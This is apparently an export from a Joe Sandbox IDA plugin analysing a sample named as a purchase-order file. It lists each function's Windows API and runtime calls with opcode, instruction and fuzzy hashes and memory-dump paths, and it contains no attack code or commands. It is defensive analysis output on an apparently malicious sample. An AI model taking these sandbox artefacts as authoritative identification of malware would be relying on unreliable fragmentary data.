                                                                            • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                            • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                            • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                                            • String ID:
                                                                            • API String ID: 1640429340-0
                                                                            • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                            • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                            • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                            • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                            APIs
                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                            • _wcslen.LIBCMT ref: 004438CD
                                                                            • _wcslen.LIBCMT ref: 004438E6
                                                                            • _wcstok.LIBCMT ref: 004438F8
                                                                            • _wcslen.LIBCMT ref: 0044390C
                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                            • _wcstok.LIBCMT ref: 00443931
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 3632110297-0
                                                                            • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                            • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                            • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                            • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                            • String ID:
                                                                            • API String ID: 752480666-0
                                                                            • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                            • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                            • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                            • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                            • String ID:
                                                                            • API String ID: 3275902921-0
                                                                            • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                            • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                            • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                            • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                            • String ID:
                                                                            • API String ID: 3275902921-0
                                                                            • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                            • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                            • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                            • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                            • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                            • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                            • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 004555C7
                                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                            • String ID:
                                                                            • API String ID: 3691411573-0
                                                                            • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                            • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                                                                            • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                            • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                                                                            APIs
                                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                            • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                            • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                            • EndPath.GDI32(?), ref: 004472D6
                                                                            • StrokePath.GDI32(?), ref: 004472E4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                            • String ID:
                                                                            • API String ID: 372113273-0
                                                                            • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                            • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                            • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                            • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0044CC6D
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                            • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                            • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                            • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 0041708E
                                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                            • __amsg_exit.LIBCMT ref: 004170AE
                                                                            • __lock.LIBCMT ref: 004170BE
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                            • _free.LIBCMT ref: 004170EE
                                                                            • InterlockedIncrement.KERNEL32(009E2D10), ref: 00417106
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                            • String ID:
                                                                            • API String ID: 3470314060-0
                                                                            • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                            • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                            • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                            • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                              • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                            • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                            • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                            • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                            • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                            • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                            • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                                            • __freefls@4.LIBCMT ref: 00415209
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 442100245-0
                                                                            • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                            • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                            • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                            • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                            APIs
                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                            • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                            • _wcslen.LIBCMT ref: 0045F94A
                                                                            • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                            • String ID: 0
                                                                            • API String ID: 621800784-4108050209
                                                                            • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
